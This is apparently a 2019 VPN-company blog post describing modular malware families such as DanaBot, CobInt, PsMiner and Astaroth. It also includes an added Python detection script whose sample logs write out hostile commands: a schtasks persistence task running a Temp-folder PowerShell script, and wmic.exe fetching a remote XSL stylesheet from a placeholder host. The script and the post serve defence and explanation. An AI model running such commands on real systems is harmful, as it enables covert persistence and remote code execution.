The new way of stealing your data – Blog @RapidVPN

August 11, 2019 by کانکشن هوشمند (Smart Connection)

RapidVPN/ June 27, 2019/ Blog/

Malware, malicious software specifically designed to disrupt, damage, or gain unauthorized access to a computer system, is something we have all heard of. It comes in different shapes and sizes: we know it as viruses, trojans, spyware, ransomware, adware, and botnets. Over the years, malware has evolved and become so sophisticated that some families use separate modules to change how they affect a target system. They are called modular malware.

Modular malware doesn’t pack all of its functionality into a single payload. It is methodical, takes a more cunning approach, and attacks the system in three stages. First, it installs only the essential components, which scout the system and network for security protections, vulnerabilities, exploitation opportunities and so on without revealing its presence. Second, it contacts its command and control server. That server sends back further instructions together with additional malware modules that carry out the actual attack (third stage).

Malware authors can rapidly change the malware’s signature to evade security programs, tailor it to specific targets, combine multiple malware modules, and so on.

Some of the most famous modular malware families are:

  • T9000 – a data gathering tool. It captures encrypted data, takes screenshots of specific
    applications, and specifically targets Microsoft Office files and Skype users. Its modules
    are designed to evade up to 24 different security products, altering its installation
    process to remain undetected.
  • DanaBot – a multi-stage banking Trojan widely known for a series of attacks against
    Australian banks in 2018. It uses different plugins to extend its functionality: a packet
    sniffing and injection plugin, a VNC remote viewing plugin, a data harvesting plugin, and a
    Tor plugin that allows for secure communication. It also contains a number of anti-analysis
    features and updated stealer and remote-control modules, so it is highly attractive to
    threat actors.
  • Marap, AdvisorsBot, and CobInt – three modular malware variants that are similar but have
    different uses. CobInt is part of a campaign by the banking and financial cybercrime
    organization Cobalt Group. Marap and AdvisorsBot scope out target systems, mapping their
    defenses and network, and decide whether the malware should download the full payload. If
    the target system has value, the malware calls for the second stage of the attack. Like
    other modular malware variants, these three follow a three-step flow. The first stage is
    typically an email with an infected attachment that carries the initial exploit. If the
    exploit executes, the malware requests the second stage. The second stage carries the
    reconnaissance module, which assesses the security measures and network landscape of the
    target system. If the malware finds that everything is appropriate, the third and final
    module downloads with the main payload.
  • DiamondFox – a real diamond in the malware market. The DiamondFox modular botnet comes
    with a range of plugins that include espionage tools, credential stealing tools, DDoS
    tools, keyloggers, spam mailers, and even a RAM scraper. Cybercriminals can buy this
    modular botnet package on underground forums to gain access to a wide range of advanced
    attack capabilities. It is regularly updated and even comes with personalized customer
    support.

These three recent examples show how modular malware has become a more sophisticated and serious threat:

Security experts have discovered a modular malware with worm capabilities that spreads from one server to another and mines Monero cryptocurrency by exploiting known vulnerabilities in servers running ElasticSearch, Hadoop, Redis, Spring, WebLogic, ThinkPHP, and SQL Server. This Monero crypto miner uses Systemctl.exe, a worm module named PsMiner written in the Go language, which bundles all the exploit modules used to break into vulnerable servers it can find on the Internet.

PsMiner’s worm module also has brute-force capabilities and a brute-force password cracking component. When the malware manages to infect a server, it executes a PowerShell command which downloads a malicious WindowsUpdate.ps1 payload that drops the Monero miner as the final infection stage. PsMiner creates an “Update service for Windows Service” scheduled task, copying the malicious WindowsUpdate.ps1 script to the Windows Temp folder. This scheduled task executes the main malware module every 10 minutes to keep persistence on the compromised system. The last-stage payload is the open-source XMRig CPU miner, which allows PsMiner to mine Monero cryptocurrency.

The Astaroth Trojan itself is nothing new, but there is now a variant that uses Avast antivirus software to gain information about the target system. Earlier versions of Astaroth would quit if Avast antivirus was detected, but this variant makes use of the LOLBins method to ‘inject’ a malicious module into one of Avast’s processes. This new Astaroth trojan uses the Avast antivirus Runtime Dynamic Link Library utility ‘aswrundll.exe’ to load a malicious module that then loads further malicious modules and gathers information about the machine, collects and exfiltrates clipboard data, password information and more.

Aswrundll.exe is very similar to Microsoft’s own rundll32.exe, which malicious actors have also abused over the years, as it enables the execution of DLLs by calling their exported functions. These are what have become known as ‘Living Off the Land Binaries’, or LOLBins for short. This particular Astaroth campaign requires the victim to download a .7zip archive containing a .lnk file that starts the malware. This then spawns a process using the Windows Management Instrumentation Command-line (wmic.exe) utility to launch an XSL script processing attack. The remote script contains well-hidden code that uses several functions to hide from antivirus defenses; it initiates the download of the payload files, disguised as images and extension-less files, which carry the Trojan modules. The techniques used in the Astaroth campaign show how truly effective these methods are at evading antivirus products.
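Both chains described above leave traces in process-creation telemetry: the PsMiner persistence mechanism (a scheduled task that re-runs WindowsUpdate.ps1 from the Windows Temp folder every 10 minutes) and the Astaroth chain (wmic.exe pulling a remote XSL stylesheet, then aswrundll.exe or rundll32.exe hosting a module disguised as an image). The following Python script is an added example, not code from the original post or from any of the researchers it cites: it runs three detection rules over a constructed, pipe-delimited sample of process-creation events. The log format, the sample events, the placeholder host example.invalid and the Avast installation path are all assumptions; the task name and file names come from the text above.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Directories an unprivileged process (or a dropper running as one) can write to.
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Users\\Public|ProgramData)\\", re.I)

# First argument after the host image, quoted or bare; stops at a comma so
# rundll32's "module.dll,ExportName" form yields only the module path.
FIRST_ARG = re.compile(r'^\s*(?:"[^"]*"|\S+)\s+(?:"([^"]+)"|([^,\s]+))')

# Constructed process-creation records: timestamp|image|command line|parent image.
# The task name and script name are from the post; hosts and install paths are assumed.
SAMPLE_EVENTS = [
    # PsMiner-style persistence: 10-minute task running a .ps1 from the Temp folder
    r'2019-06-27T10:00:01|C:\Windows\System32\schtasks.exe|schtasks.exe /Create /F /SC MINUTE /MO 10 /TN "Update service for Windows Service" /TR "powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\WindowsUpdate.ps1"|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
    # Legitimate daily task: must not be flagged
    r'2019-06-27T10:05:00|C:\Windows\System32\schtasks.exe|schtasks.exe /Create /SC DAILY /TN "Nightly Backup" /TR "C:\Program Files\Backup\backup.exe"|C:\Windows\explorer.exe',
    # Astaroth-style XSL script processing through wmic.exe (placeholder host)
    r'2019-06-27T10:10:12|C:\Windows\System32\wbem\WMIC.exe|wmic.exe os get /format:"https://example.invalid/v.xsl"|C:\Windows\explorer.exe',
    # Ordinary wmic inventory query: must not be flagged
    r'2019-06-27T10:11:00|C:\Windows\System32\wbem\WMIC.exe|wmic.exe os get caption|C:\Windows\System32\cmd.exe',
    # aswrundll.exe hosting a module disguised as an image (Avast path is assumed)
    r'2019-06-27T10:10:20|C:\Program Files\AVAST Software\Avast\aswrundll.exe|"C:\Program Files\AVAST Software\Avast\aswrundll.exe" C:\Users\Public\Libraries\sample_image.jpg|C:\Windows\System32\wbem\WMIC.exe',
    # Normal rundll32 call into a system DLL: must not be flagged
    r'2019-06-27T10:12:00|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL|C:\Windows\explorer.exe',
]


@dataclass
class ProcEvent:
    timestamp: str
    image: str
    cmdline: str
    parent: str


def parse_event(line: str) -> Optional[ProcEvent]:
    """Parse one pipe-delimited record; malformed lines yield None and are skipped."""
    parts = line.rstrip("\n").split("|", 3)
    return ProcEvent(*parts) if len(parts) == 4 else None


def image_name(ev: ProcEvent) -> str:
    return ntpath.basename(ev.image).lower()


def check_scheduled_task(ev: ProcEvent) -> Optional[str]:
    """PsMiner-style persistence: a short-interval task running a .ps1 from a user-writable directory."""
    if image_name(ev) != "schtasks.exe":
        return None
    low = ev.cmdline.lower()
    every = re.search(r"/mo\s+(\d+)", low)
    if ("/create" in low and re.search(r"/sc\s+minute", low) and every
            and int(every.group(1)) <= 15 and ".ps1" in low
            and USER_WRITABLE.search(ev.cmdline)):
        return f"scheduled task re-runs a PowerShell script from a user-writable directory every {every.group(1)} minutes"
    return None


def check_wmic_remote_xsl(ev: ProcEvent) -> Optional[str]:
    """Astaroth-style XSL script processing: wmic.exe handed a remote (http/https/UNC) /format: stylesheet."""
    if image_name(ev) != "wmic.exe":
        return None
    if re.search(r'/format:\s*"?(?:https?://|\\\\)', ev.cmdline, re.I):
        return "wmic.exe loads an XSL stylesheet from a remote location"
    return None


def check_dll_host(ev: ProcEvent) -> Optional[str]:
    """rundll32.exe / aswrundll.exe loading a module that is not a .dll or sits in a user-writable path."""
    host = image_name(ev)
    if host not in ("rundll32.exe", "aswrundll.exe"):
        return None
    m = FIRST_ARG.match(ev.cmdline)
    if not m:
        return None
    module = m.group(1) or m.group(2)
    if ntpath.splitext(module)[1].lower() != ".dll" or USER_WRITABLE.search(module):
        return f"{host} loads a suspicious module: {module}"
    return None


RULES = (check_scheduled_task, check_wmic_remote_xsl, check_dll_host)


def analyze(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (rule name, timestamp, reason) for every event that trips a rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for rule in RULES:
            reason = rule(ev)
            if reason:
                findings.append((rule.__name__, ev.timestamp, reason))
    return findings


if __name__ == "__main__":
    for name, ts, reason in analyze(SAMPLE_EVENTS):
        print(f"{ts}  [{name}]  {reason}")
```

Run against the constructed sample, the three malicious events are reported and the three benign ones are not. The rules are deliberately narrow (an interval of 15 minutes or less, a module outside the .dll extension or inside a user-writable path) so they can be tuned against real telemetry; with a Sysmon or EDR export, only `parse_event` needs to change to match the field layout.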

The previously mentioned CobInt represents a new malware technique that makes phishing attacks harder to spot. Last summer, researchers at Proofpoint discovered a pair of modular downloaders with two unusual factors in their use. First, the loaders were conducting reconnaissance on the infected system to decide whether the full payload would be downloaded. Second, the loaders, with very small and carefully obfuscated footprints, were being launched by a major criminal organization, the Cobalt Group. This was the first time the researchers had seen major actors using tiny downloaders in this way. The new modular downloader, named “CobInt”, is difficult to detect if you don’t know what you’re looking for. The process of infecting a target machine is performed in three steps. Each of the three modules is small and uses multiple layers of obfuscation to avoid detection. The first module is an email with an attachment carrying the initial exploit. If the exploit code can execute, it immediately sends a request for the second-stage downloader. This downloader, written in C, observes the target system to determine whether certain security measures are running that might trap the malware. If the system looks safe to the malware, it downloads the final payload and establishes persistence on the computer. Although the process has multiple steps, the total execution time is measured in seconds. So far the targets are Russia and the former Soviet republics of the Commonwealth of Independent States, but the approach may attract other malicious actors around the world.

So far, there is no specific tool that can entirely protect you from modular malware variants. All you can do is keep your system up to date and invest in anti-virus and anti-malware software.

